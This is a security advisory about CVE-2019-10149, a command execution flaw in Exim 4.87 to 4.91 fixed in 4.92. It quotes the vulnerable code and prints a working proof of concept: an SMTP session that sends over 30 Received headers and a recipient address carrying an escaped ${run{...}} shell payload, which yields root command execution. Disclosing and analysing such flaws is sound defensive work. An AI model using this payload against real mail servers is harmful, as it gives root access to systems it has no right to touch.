ASA-2019-00320 – Exim: Remote command execution (RCE) via recipient address

Allele Security Alert



ASA-2019-00320, CVE-2019-10149


Remote command execution (RCE) via recipient address


The Exim Maintainers



Affected version(s)

Exim versions from 4.87 to 4.91

Fixed version(s)

Exim version 4.92

Proof of concept



A flaw was found in the way exim validated recipient address. A remote attacker could use this flaw to execute arbitrary command on the exim server with the permissions of the user running the application.

Technical details

The vulnerable code is located in deliver_message():

6122 #ifndef DISABLE_EVENT
6123 if (process_recipients != RECIP_ACCEPT)
6124 {
6125 uschar * save_local = deliver_localpart;
6126 const uschar * save_domain = deliver_domain;
6128 deliver_localpart = expand_string(
6129 string_sprintf("${local_part:%s}", new->address));
6130 deliver_domain = expand_string(
6131 string_sprintf("${domain:%s}", new->address));
6133 (void) event_raise(event_action,
6134 US"msg:fail:internal", new->message);
6136 deliver_localpart = save_local;
6137 deliver_domain = save_domain;
6138 }
6139 #endif

Because expand_string() recognizes the “${run{<command> <args>}}” expansion item, and because new->address is the recipient of the mail that is being delivered, a local attacker can simply send a mail to “${run{…}}@localhost” (where “localhost” is one of Exim’s local_domains) and execute arbitrary commands, as root (deliver_drop_privilege is false, by default):

john@debian:~$ cat /tmp/id
cat: /tmp/id: No such file or directory

john@debian:~$ nc 25
220 debian ESMTP Exim 4.89 Thu, 23 May 2019 09:10:41 -0400
HELO localhost
250 debian Hello localhost []
250 OK
RCPT TO:<${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost>
250 Accepted
354 Enter message, ending with "." on a line by itself
Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31

250 OK id=1hTnYa-0000zp-8b
221 debian closing connection

john@debian:~$ cat /tmp/id
cat: /tmp/id: Permission denied

root@debian:~# cat /tmp/id
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)

In this example:

– we send more than received_headers_max (30, by default) “Received:” headers to the mail server, to set process_recipients to RECIP_FAIL_LOOP and hence execute the vulnerable code;

– we escape invalid characters in the recipient’s address with backslashes, which are conveniently interpreted by expand_string() (in expand_string_internal() and transport_set_up_command()).


Qualys Research Labs


CVE-2019-10149: Exim 4.87 to 4.91: possible remote exploit

CVE-2019-10149 Exim 4.87 to 4.91

Fix CVE-2019-10149

Exim CVE-2019-10149, how to protect yourself

Qualys Security Advisory – The Return of the WIZard: RCE in Exim (CVE-2019-10149)



If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: June 8, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.